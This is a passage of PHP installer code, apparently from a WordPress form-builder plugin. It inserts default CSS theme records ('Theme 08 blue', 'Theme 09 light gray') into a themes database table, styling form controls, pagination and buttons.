relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/08/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8A8A8A;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8A8A8A;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #CDCDCD;\r\nbackground-color: #F8F8F8;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-right:3px;\r\nmargin-bottom:3px;\r\nfont-weight: bold;\r\n}\r\n.page_active {\r\n	color: #930049;\r\ncursor: pointer;\r\nbackground-color: #fff;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #EEEEEE;\r\nfont-weight: bold;\r\nmargin-right:3px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 1px;\r\nborder-spacing: 0px;\r\nheight: 21px;\r\nline-height: 20px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nbackground: #930049;\r\n}\r\n.page_percentage_deactive {\r\n	height: 24px;\r\nline-height: 20px;\r\nbackground-color: #FFFFFF;\r\ntext-align: left !important;\r\nmargin: 0 5px;\r\nborder: 1px solid #EEEEEE;\r\ndisplay: inline-block;\r\nwidth: 98%;\r\nborder-bottom: none;\r\n\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -1px;\r\n}\r\n\r\n.wdform_percentage_text {\r\n	color: #fff;\r\n	font-weight: bold;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(30, \'Theme 08 blue\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #070068;\r\nmargin-bottom: 10px;\r\ncolor: #070068;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\na.ui-spinner-button\r\n{\r\nbackground:none !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #414141;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #070068 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 1px solid #EEEEEE !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/08/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/08/next.png) no-repeat right;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/08/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #070068;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #070068;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break \r\n{\r\n	color: #070068;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 0px solid #fff;\r\ncolor: #414141;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type="text"]:focus {\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus {\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #636363;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/08/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8A8A8A;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8A8A8A;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #CDCDCD;\r\nbackground-color: #F8F8F8;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-right:3px;\r\nmargin-bottom:3px;\r\nfont-weight: bold;\r\n}\r\n.page_active {\r\n	color: #070068;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #EEEEEE;\r\nfont-weight: bold;\r\nmargin-right:3px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 1px;\r\nborder-spacing: 0px;\r\nheight: 21px;\r\nline-height: 20px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nbackground: #070068;\r\n}\r\n.page_percentage_deactive {\r\n	height: 24px;\r\nline-height: 20px;\r\nbackground-color: #FFFFFF;\r\ntext-align: left !important;\r\nmargin: 0 5px;\r\nborder: 1px solid #EEEEEE;\r\ndisplay: inline-block;\r\nwidth: 98%;\r\nborder-bottom: none;\r\n\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -1px;\r\n}\r\n\r\n.wdform_percentage_text {\r\n	color: #fff;\r\n	font-weight: bold;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(31, \'Theme 09 light gray\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #DDDDDD;\r\nborder: 1px solid #818181;\r\nmargin-bottom: 10px;\r\ncolor: #818181;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\nborder-top: 1px solid #7F7F7F !important;\r\n\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 1px solid #B7B7B7;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 